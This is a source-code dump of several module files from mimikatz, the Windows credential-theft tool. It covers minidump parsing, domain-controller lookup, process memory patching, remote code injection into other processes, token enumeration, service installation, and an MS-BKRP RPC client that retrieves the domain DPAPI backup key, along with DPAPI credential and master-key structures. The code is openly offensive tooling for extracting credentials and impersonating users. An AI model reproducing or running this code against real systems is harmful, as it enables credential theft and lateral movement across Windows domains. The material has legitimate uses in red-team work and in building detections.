16 | BOOL kull_m_minidump_close(IN PKULL_M_MINIDUMP_HANDLE hMinidump);
17 | BOOL kull_m_minidump_copy(IN PKULL_M_MINIDUMP_HANDLE hMinidump, OUT VOID *Destination, IN VOID *Source, IN SIZE_T Length);
18 |
19 | LPVOID kull_m_minidump_RVAtoPTR(IN PKULL_M_MINIDUMP_HANDLE hMinidump, RVA64 rva);
20 | LPVOID kull_m_minidump_stream(IN PKULL_M_MINIDUMP_HANDLE hMinidump, MINIDUMP_STREAM_TYPE type, OUT OPTIONAL DWORD *pSize);
21 | LPVOID kull_m_minidump_remapVirtualMemory64(IN PKULL_M_MINIDUMP_HANDLE hMinidump, IN VOID *Source, IN SIZE_T Length);
--------------------------------------------------------------------------------
/modules/kull_m_net.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_net.h"
7 |
8 | BOOL kull_m_net_getCurrentDomainInfo(PPOLICY_DNS_DOMAIN_INFO * pDomainInfo)
9 | {
10 | BOOL status = FALSE;
11 | LSA_HANDLE hLSA;
12 | LSA_OBJECT_ATTRIBUTES oaLsa = {0};
13 |
14 | if(NT_SUCCESS(LsaOpenPolicy(NULL, &oaLsa, POLICY_VIEW_LOCAL_INFORMATION, &hLSA)))
15 | {
16 | status = NT_SUCCESS(LsaQueryInformationPolicy(hLSA, PolicyDnsDomainInformation, (PVOID *) pDomainInfo));
17 | LsaClose(hLSA);
18 | }
19 | return status;
20 | }
21 |
22 | BOOL kull_m_net_CreateWellKnownSid(WELL_KNOWN_SID_TYPE WellKnownSidType, PSID DomainSid, PSID * pSid)
23 | {
24 | BOOL status = FALSE;
25 | DWORD szNeeded = 0, dwError;
26 | CreateWellKnownSid(WellKnownSidType, DomainSid, NULL, &szNeeded);
27 | dwError = GetLastError();
28 | if((dwError == ERROR_INVALID_PARAMETER) || (dwError == ERROR_INSUFFICIENT_BUFFER))
29 | if(*pSid = (PSID) LocalAlloc(LPTR, szNeeded))
30 | if(!(status = CreateWellKnownSid(WellKnownSidType, DomainSid, *pSid, &szNeeded)))
31 | *pSid = LocalFree(*pSid);
32 | return status;
33 | }
34 |
35 | BOOL kull_m_net_getDC(LPCWSTR fullDomainName, DWORD altFlags, LPWSTR * fullDCName)
36 | {
37 | BOOL status = FALSE;
38 | DWORD ret, size;
39 | PDOMAIN_CONTROLLER_INFO cInfo = NULL;
40 | ret = DsGetDcName(NULL, fullDomainName, NULL, NULL, altFlags | DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo);
41 | if(ret == ERROR_SUCCESS)
42 | {
43 | size = (DWORD) (wcslen(cInfo->DomainControllerName + 2) + 1) * sizeof(wchar_t);
44 | if(*fullDCName = (wchar_t *) LocalAlloc(LPTR, size))
45 | {
46 | status = TRUE;
47 | RtlCopyMemory(*fullDCName, cInfo->DomainControllerName + 2, size);
48 | }
49 | NetApiBufferFree(cInfo);
50 | }
51 | else PRINT_ERROR(L"DsGetDcName: %u\n", ret);
52 | return status;
53 | }
54 |
55 | BOOL kull_m_net_getComputerName(BOOL isFull, LPWSTR *name)
56 | {
57 | BOOL status = FALSE;
58 | COMPUTER_NAME_FORMAT ft = isFull ? ComputerNamePhysicalDnsFullyQualified : ComputerNamePhysicalNetBIOS;
59 | DWORD dwSize = 0;
60 | if(!GetComputerNameEx(ft, NULL, &dwSize) && (GetLastError() == ERROR_MORE_DATA))
61 | {
62 | if(*name = (wchar_t *) LocalAlloc(LPTR, dwSize * sizeof(wchar_t)))
63 | {
64 | if(!(status = GetComputerNameEx(ft, *name, &dwSize)))
65 | {
66 | PRINT_ERROR_AUTO(L"GetComputerNameEx(data)");
67 | LocalFree(*name);
68 | }
69 | }
70 | }
71 | else PRINT_ERROR_AUTO(L"GetComputerNameEx(init)");
72 | return status;
73 | }
--------------------------------------------------------------------------------
/modules/kull_m_output.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <io.h>
9 | #include <fcntl.h>
10 |
11 | FILE * logfile;
12 | #if !defined(MIMIKATZ_W2000_SUPPORT)
13 | wchar_t * outputBuffer;
14 | size_t outputBufferElements, outputBufferElementsPosition;
15 | #endif
16 |
17 | void kprintf(PCWCHAR format, ...);
18 | void kprintf_inputline(PCWCHAR format, ...);
19 |
20 | BOOL kull_m_output_file(PCWCHAR file);
21 |
22 | void kull_m_output_init();
23 | void kull_m_output_clean();
--------------------------------------------------------------------------------
/modules/kull_m_patch.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kull_m_memory.h"
8 | #include "kull_m_service.h"
9 | #include "kull_m_process.h"
10 |
11 | typedef NTSTATUS (* PKULL_M_PATCH_CALLBACK) (int argc, wchar_t * args[]);
12 |
13 | typedef struct _KULL_M_PATCH_PATTERN {
14 | DWORD Length;
15 | BYTE *Pattern;
16 | } KULL_M_PATCH_PATTERN, *PKULL_M_PATCH_PATTERN;
17 |
18 | typedef struct _KULL_M_PATCH_OFFSETS {
19 | LONG off0;
20 | #if defined(_M_ARM64)
21 | LONG armOff0;
22 | #endif
23 | LONG off1;
24 | #if defined(_M_ARM64)
25 | LONG armOff1;
26 | #endif
27 | LONG off2;
28 | #if defined(_M_ARM64)
29 | LONG armOff2;
30 | #endif
31 | LONG off3;
32 | #if defined(_M_ARM64)
33 | LONG armOff3;
34 | #endif
35 | LONG off4;
36 | #if defined(_M_ARM64)
37 | LONG armOff4;
38 | #endif
39 | LONG off5;
40 | #if defined(_M_ARM64)
41 | LONG armOff5;
42 | #endif
43 | LONG off6;
44 | #if defined(_M_ARM64)
45 | LONG armOff6;
46 | #endif
47 | LONG off7;
48 | #if defined(_M_ARM64)
49 | LONG armOff7;
50 | #endif
51 | LONG off8;
52 | #if defined(_M_ARM64)
53 | LONG armOff8;
54 | #endif
55 | LONG off9;
56 | #if defined(_M_ARM64)
57 | LONG armOff9;
58 | #endif
59 | } KULL_M_PATCH_OFFSETS, *PKULL_M_PATCH_OFFSETS;
60 |
61 | typedef struct _KULL_M_PATCH_GENERIC {
62 | DWORD MinBuildNumber;
63 | KULL_M_PATCH_PATTERN Search;
64 | KULL_M_PATCH_PATTERN Patch;
65 | KULL_M_PATCH_OFFSETS Offsets;
66 | } KULL_M_PATCH_GENERIC, *PKULL_M_PATCH_GENERIC;
67 |
68 | typedef struct _KULL_M_PATCH_MULTIPLE {
69 | KULL_M_PATCH_PATTERN Search;
70 | KULL_M_PATCH_PATTERN Patch;
71 | LONG Offset;
72 | KULL_M_MEMORY_ADDRESS AdressOfPatch;
73 | DWORD OldProtect;
74 | KULL_M_MEMORY_ADDRESS LocalBackup;
75 | } KULL_M_PATCH_MULTIPLE, *PKULL_M_PATCH_MULTIPLE;
76 |
77 | BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack);
78 | PKULL_M_PATCH_GENERIC kull_m_patch_getGenericFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, DWORD BuildNumber);
79 | BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService);
--------------------------------------------------------------------------------
/modules/kull_m_pipe.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | BOOL kull_m_pipe_server(LPCWCHAR pipeName, HANDLE *phPipe);
10 | BOOL kull_m_pipe_server_connect(HANDLE hPipe);
11 | BOOL kull_m_pipe_client(LPCWCHAR pipeName, PHANDLE phPipe);
12 | BOOL kull_m_pipe_read(HANDLE hPipe, LPBYTE *buffer, DWORD *size);
13 | BOOL kull_m_pipe_write(HANDLE hPipe, LPCVOID buffer, DWORD size);
14 | BOOL kull_m_pipe_close(PHANDLE phPipe);
--------------------------------------------------------------------------------
/modules/kull_m_rdm.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_string.h"
9 | #include "kull_m_hid.h" // to adapt
10 |
11 | #define RDM_SLEEP_BEFORE_SEND 10
12 | #define RDM_SLEEP_BEFORE_RECV 10
13 |
14 |
15 | #define RDM_IOCTL_14443A_REQ 0x03
16 | #define RDM_IOCTL_14443A_ANTICOLL 0x04
17 | #define RDM_IOCTL_14443A_SELECT 0x05
18 | #define RDM_IOCTL_14443A_HALT 0x06
19 |
20 | #define RDM_IOCTL_14443B_REQ 0x09
21 | #define RDM_IOCTL_14443B_ANTICOLL 0x0a
22 | #define RDM_IOCTL_14443B_ATTRIB 0x0b
23 | #define RDM_IOCTL_14443B_RESET 0x0c
24 |
25 | #define RDM_IOCTL_14443_DIRECT 0x0d // ISO14443_TypeB_Transfer_Command (MF_TypeATransCOSCmd in code ?)
26 |
27 | #define RDM_IOCTL_15693_INVENTORY 0x10
28 | #define RDM_IOCTL_15693_READ 0x11
29 | #define RDM_IOCTL_15693_WRITE 0x12
30 | #define RDM_IOCTL_15693_LOCK_BLOCK 0x13
31 | #define RDM_IOCTL_15693_STAY_QUIET 0x14
32 | #define RDM_IOCTL_15693_SELECT 0x15
33 | #define RDM_IOCTL_15693_RESET_TO_READY 0x16
34 | #define RDM_IOCTL_15693_WRITE_AFI 0x17
35 | #define RDM_IOCTL_15693_LOCK_AFI 0x18
36 | #define RDM_IOCTL_15693_WRITE_DSFID 0x19
37 | #define RDM_IOCTL_15693_LOCK_DSFID 0x1a
38 | #define RDM_IOCTL_15693_GET_INFORMATION 0x1b
39 | #define RDM_IOCTL_15693_GET_MULTIPLE_BLOCK_SECURITY 0x1c
40 | #define RDM_IOCTL_15693_DIRECT 0x1d
41 |
42 |
43 | #define RDM_IOCTL_MF_READ 0x20
44 | #define RDM_IOCTL_MF_WRITE 0x21
45 | #define RDM_IOCTL_MF_INIT_VALUE 0x22
46 | #define RDM_IOCTL_MF_DEC 0x23
47 | #define RDM_IOCTL_MF_INC 0x24
48 | #define RDM_IOCTL_MF_GET_SNR 0x25
49 |
50 | #define RDM_IOCTL_MF_RESTORE 0x28 // ISO14443_TypeA_Transfer_Command(0X28) ?
51 |
52 | // SYSTEM COMMANDS
53 | #define RDM_IOCTL_SET_ADDRESS 0x80
54 | #define RDM_IOCTL_SET_BAUDRATE 0x81
55 | #define RDM_IOCTL_SET_SER_NUM 0x82
56 | #define RDM_IOCTL_GET_SER_NUM 0x83
57 | #define RDM_IOCTL_SET_USER_INFO 0x84
58 | #define RDM_IOCTL_GET_USER_INFO 0x85
59 | #define RDM_IOCTL_GET_VERSION 0x86
60 | #define RDM_IOCTL_CONTROL_LED1 0x87
61 | #define RDM_IOCTL_CONTROL_LED2 0x88
62 | #define RDM_IOCTL_CONTROL_BUZZER 0x89
63 |
64 |
65 | typedef struct _RDM_DEVICE {
66 | struct _RDM_DEVICE * next;
67 | DWORD id;
68 | PWCHAR DevicePath;
69 | HIDD_ATTRIBUTES hidAttributes;
70 | HIDP_CAPS hidCaps;
71 | HANDLE hDevice;
72 | } RDM_DEVICE, *PRDM_DEVICE;
73 |
74 | BOOL rdm_get_version(HANDLE hFile, PSTR *version);
75 |
76 | BOOL rdm_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *out, BYTE *szOut);
77 | BOOL rdm_devices_get(PRDM_DEVICE *devices, DWORD *count);
78 | void rdm_devices_free(PRDM_DEVICE devices);
--------------------------------------------------------------------------------
/modules/kull_m_remotelib.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "../modules/kull_m_process.h"
9 |
10 | typedef struct _REMOTE_LIB_OUTPUT_DATA {
11 | PVOID outputVoid;
12 | DWORD outputDword;
13 | NTSTATUS outputStatus;
14 | DWORD outputSize;
15 | PVOID outputData;
16 | } REMOTE_LIB_OUTPUT_DATA, *PREMOTE_LIB_OUTPUT_DATA;
17 |
18 | typedef struct _REMOTE_LIB_INPUT_DATA {
19 | PVOID inputVoid;
20 | DWORD inputDword;
21 | DWORD inputSize;
22 | BYTE inputData[ANYSIZE_ARRAY];
23 | } REMOTE_LIB_INPUT_DATA, *PREMOTE_LIB_INPUT_DATA;
24 |
25 | typedef struct _REMOTE_LIB_DATA {
26 | REMOTE_LIB_OUTPUT_DATA output;
27 | REMOTE_LIB_INPUT_DATA input;
28 | } REMOTE_LIB_DATA, *PREMOTE_LIB_DATA;
29 |
30 | typedef struct _REMOTE_EXT {
31 | PCWCHAR Module;
32 | PCHAR Function;
33 | PVOID ToReplace;
34 | PVOID Pointer;
35 | } REMOTE_EXT, *PREMOTE_EXT;
36 |
37 | typedef struct _MULTIPLE_REMOTE_EXT {
38 | DWORD count;
39 | PREMOTE_EXT extensions;
40 | } MULTIPLE_REMOTE_EXT, *PMULTIPLE_REMOTE_EXT;
41 |
42 | BOOL CALLBACK kull_m_remotelib_callback_module_exportedEntry(PKULL_M_PROCESS_EXPORTED_ENTRY pExportedEntryInformations, PVOID pvArg);
43 | PREMOTE_LIB_INPUT_DATA kull_m_remotelib_CreateInput(PVOID inputVoid, DWORD inputDword, DWORD inputSize, LPCVOID inputData);
44 | BOOL kull_m_remotelib_create(PKULL_M_MEMORY_ADDRESS aRemoteFunc, PREMOTE_LIB_INPUT_DATA input, PREMOTE_LIB_OUTPUT_DATA output);
45 |
46 | BOOL CALLBACK kull_m_remotelib_exports_callback_module_exportedEntry(PKULL_M_PROCESS_EXPORTED_ENTRY pExportedEntryInformations, PVOID pvArg);
47 | BOOL CALLBACK kull_m_remotelib_exports_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
48 | BOOL kull_m_remotelib_GetProcAddressMultipleModules(PKULL_M_MEMORY_HANDLE hProcess, PMULTIPLE_REMOTE_EXT extForCb);
49 | BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE hProcess, LPCVOID Buffer, DWORD BufferSize, PMULTIPLE_REMOTE_EXT RemoteExt, PKULL_M_MEMORY_ADDRESS DestAddress);
--------------------------------------------------------------------------------
/modules/kull_m_service.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <aclapi.h>
9 |
10 | BOOL kull_m_service_getUniqueForName(PCWSTR serviceName, SERVICE_STATUS_PROCESS * pServiceStatusProcess);
11 |
12 | BOOL kull_m_service_start(PCWSTR serviceName);
13 | BOOL kull_m_service_remove(PCWSTR serviceName);
14 | BOOL kull_m_service_stop(PCWSTR serviceName);
15 | BOOL kull_m_service_suspend(PCWSTR serviceName);
16 | BOOL kull_m_service_resume(PCWSTR serviceName);
17 | BOOL kull_m_service_preshutdown(PCWSTR serviceName);
18 | BOOL kull_m_service_shutdown(PCWSTR serviceName);
19 |
20 | BOOL kull_m_service_genericControl(PCWSTR serviceName, DWORD dwDesiredAccess, DWORD dwControl, LPSERVICE_STATUS ptrServiceStatus);
21 | BOOL kull_m_service_addWorldToSD(SC_HANDLE monHandle);
22 | BOOL kull_m_service_install(PCWSTR serviceName, PCWSTR displayName, PCWSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt);
23 | BOOL kull_m_service_uninstall(PCWSTR serviceName);
--------------------------------------------------------------------------------
/modules/kull_m_token.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_handle.h"
9 | #include <sddl.h>
10 |
11 | extern NTSTATUS NTAPI NtCompareTokens(IN HANDLE FirstTokenHandle, IN HANDLE SecondTokenHandle, OUT PBOOLEAN Equal);
12 |
13 | typedef BOOL (CALLBACK * PKULL_M_TOKEN_ENUM_CALLBACK) (HANDLE hToken, DWORD ptid, PVOID pvArg);
14 |
15 | typedef struct _KULL_M_TOKEN_ENUM_DATA {
16 | PKULL_M_TOKEN_ENUM_CALLBACK callback;
17 | PVOID pvArg;
18 | BOOL mustContinue;
19 | } KULL_M_TOKEN_ENUM_DATA, *PKULL_M_TOKEN_ENUM_DATA;
20 |
21 | typedef struct _KULL_M_TOKEN_LIST {
22 | HANDLE hToken;
23 | DWORD ptid;
24 | struct _KULL_M_TOKEN_LIST *next;
25 | } KULL_M_TOKEN_LIST, *PKULL_M_TOKEN_LIST;
26 |
27 | BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg);
28 | BOOL kull_m_token_getTokensUnique(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg);
29 | BOOL CALLBACK kull_m_token_getTokensUnique_callback(HANDLE hToken, DWORD ptid, PVOID pvArg);
30 | BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
31 | BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
32 |
33 | BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse);
34 | BOOL kull_m_token_CheckTokenMembership(__in_opt HANDLE TokenHandle, __in PSID SidToCheck, __out PBOOL IsMember);
35 | PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse);
36 | BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
37 | BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
38 |
39 | BOOL kull_m_token_equal(IN HANDLE First, IN HANDLE Second);
40 | PTOKEN_USER kull_m_token_getUserFromToken(HANDLE hToken);
41 | PWSTR kull_m_token_getSidFromToken(HANDLE hToken);
42 | PWSTR kull_m_token_getCurrentSid();
43 | BOOL kull_m_token_isLocalAccount(__in_opt HANDLE TokenHandle, __out PBOOL IsMember);
--------------------------------------------------------------------------------
/modules/kull_m_xml.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <msxml2.h>
9 | #include "kull_m_string.h"
10 |
11 | IXMLDOMDocument * kull_m_xml_CreateAndInitDOM();
12 | void kull_m_xml_ReleaseDom(IXMLDOMDocument *pDoc);
13 |
14 | BOOL kull_m_xml_LoadXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename);
15 | BOOL kull_m_xml_SaveXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename);
16 |
17 | wchar_t * kull_m_xml_getAttribute(IXMLDOMNode *pNode, PCWSTR name);
18 | wchar_t * kull_m_xml_getTextValue(IXMLDOMNode *pNode, PCWSTR name);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_bkrp.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_rpc_bkrp.h"
7 |
8 | BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
9 | {
10 | BOOL status = FALSE;
11 | LPWSTR szTmpDc = NULL;
12 | if(!NetworkAddr)
13 | if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc))
14 | NetworkAddr = szTmpDc;
15 | if(NetworkAddr)
16 | status = kull_m_rpc_createBinding(NULL, L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
17 | if(szTmpDc)
18 | LocalFree(szTmpDc);
19 | return status;
20 | }
21 |
22 | BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
23 | {
24 | BOOL status = FALSE;
25 | RPC_BINDING_HANDLE hBinding;
26 | NET_API_STATUS netStatus;
27 | PBYTE out = NULL;
28 | *pDataOut = NULL;
29 | *pdwDataOut = 0;
30 | if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
31 | {
32 | RpcTryExcept
33 | {
34 | netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
35 | if(status = (netStatus == 0))
36 | {
37 | if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut))
38 | RtlCopyMemory(*pDataOut, out, *pdwDataOut);
39 | MIDL_user_free(out);
40 | }
41 | else PRINT_ERROR(L"BackuprKey: 0x%08x (%u)\n", netStatus, netStatus);
42 | }
43 | RpcExcept(RPC_EXCEPTION)
44 | PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
45 | RpcEndExcept
46 | kull_m_rpc_deleteBinding(&hBinding);
47 | }
48 | return status;
49 | }
50 |
51 | BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
52 | {
53 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
54 | }
55 |
56 | BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
57 | {
58 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
59 | }
60 |
61 | BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
62 | {
63 | BYTE dataIn = 'k';
64 | return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut);
65 | }
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_bkrp.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_rpc_ms-bkrp.h"
9 | #include "../kull_m_net.h"
10 |
11 | BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding);
12 |
13 | BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
14 |
15 | BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
16 | BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
17 | BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_dpapi-entries.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 | #include "../kull_m_crypto.h"
4 |
5 | typedef struct _KUHL_M_DPAPI_MASTERKEY_ENTRY {
6 | GUID guid;
7 | BYTE keyHash[SHA_DIGEST_LENGTH];
8 | DWORD keyLen;
9 | BYTE *key;
10 | } KUHL_M_DPAPI_MASTERKEY_ENTRY, *PKUHL_M_DPAPI_MASTERKEY_ENTRY;
11 |
12 | typedef struct _KUHL_M_DPAPI_CREDENTIAL_ENTRY {
13 | DWORD flags;
14 | GUID guid;
15 | WCHAR *sid;
16 | BYTE md4hash[LM_NTLM_HASH_LENGTH];
17 | BYTE md4hashDerived[SHA_DIGEST_LENGTH];
18 | BYTE sha1hash[SHA_DIGEST_LENGTH];
19 | BYTE sha1hashDerived[SHA_DIGEST_LENGTH];
20 | BYTE md4protectedhash[LM_NTLM_HASH_LENGTH];
21 | BYTE md4protectedhashDerived[SHA_DIGEST_LENGTH];
22 | } KUHL_M_DPAPI_CREDENTIAL_ENTRY, *PKUHL_M_DPAPI_CREDENTIAL_ENTRY;
23 |
24 | typedef struct _KUHL_M_DPAPI_DOMAINKEY_ENTRY {
25 | GUID guid;
26 | BOOL isNewKey;
27 | DWORD keyLen;
28 | BYTE *key;
29 | } KUHL_M_DPAPI_DOMAINKEY_ENTRY, *PKUHL_M_DPAPI_DOMAINKEY_ENTRY;
30 |
31 | typedef struct _KUHL_M_DPAPI_ENTRIES {
32 | DWORD MasterKeyCount;
33 | PKUHL_M_DPAPI_MASTERKEY_ENTRY *MasterKeys;
34 | DWORD CredentialCount;
35 | PKUHL_M_DPAPI_CREDENTIAL_ENTRY *Credentials;
36 | DWORD DomainKeyCount;
37 | PKUHL_M_DPAPI_DOMAINKEY_ENTRY *DomainKeys;
38 | } KUHL_M_DPAPI_ENTRIES, *PKUHL_M_DPAPI_ENTRIES;
39 |
40 | size_t KUHL_M_DPAPI_ENTRIES_AlignSize(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
41 | void KUHL_M_DPAPI_ENTRIES_Encode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
42 | void KUHL_M_DPAPI_ENTRIES_Decode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
43 | void KUHL_M_DPAPI_ENTRIES_Free(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
44 |
45 | #define kull_m_dpapi_oe_DecodeDpapiEntries(/*PVOID */data, /*DWORD */size, /*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) KUHL_M_DPAPI_ENTRIES_Decode)
46 | #define kull_m_dpapi_oe_FreeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) KUHL_M_DPAPI_ENTRIES_Free)
47 | #define kull_m_dpapi_oe_EncodeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject, /*PVOID **/data, /*DWORD **/size) kull_m_rpc_Generic_Encode(pObject, data, size, (PGENERIC_RPC_ENCODE) KUHL_M_DPAPI_ENTRIES_Encode, (PGENERIC_RPC_ALIGNSIZE) KUHL_M_DPAPI_ENTRIES_AlignSize)
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_mimicom.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 |
4 | typedef void *MIMI_HANDLE;
5 |
6 | NTSTATUS SRV_MimiBind(handle_t rpc_handle, PMIMI_PUBLICKEY clientPublicKey, PMIMI_PUBLICKEY serverPublicKey, MIMI_HANDLE *phMimi);
7 | NTSTATUS SRV_MiniUnbind(MIMI_HANDLE *phMimi);
8 | NTSTATUS SRV_MimiCommand(MIMI_HANDLE phMimi, DWORD szEncCommand, BYTE *encCommand, DWORD *szEncResult, BYTE **encResult);
9 | NTSTATUS SRV_MimiClear(handle_t rpc_handle, wchar_t *command, DWORD *size, wchar_t **result);
10 |
11 | NTSTATUS CLI_MimiBind(handle_t rpc_handle, PMIMI_PUBLICKEY clientPublicKey, PMIMI_PUBLICKEY serverPublicKey, MIMI_HANDLE *phMimi);
12 | NTSTATUS CLI_MiniUnbind(MIMI_HANDLE *phMimi);
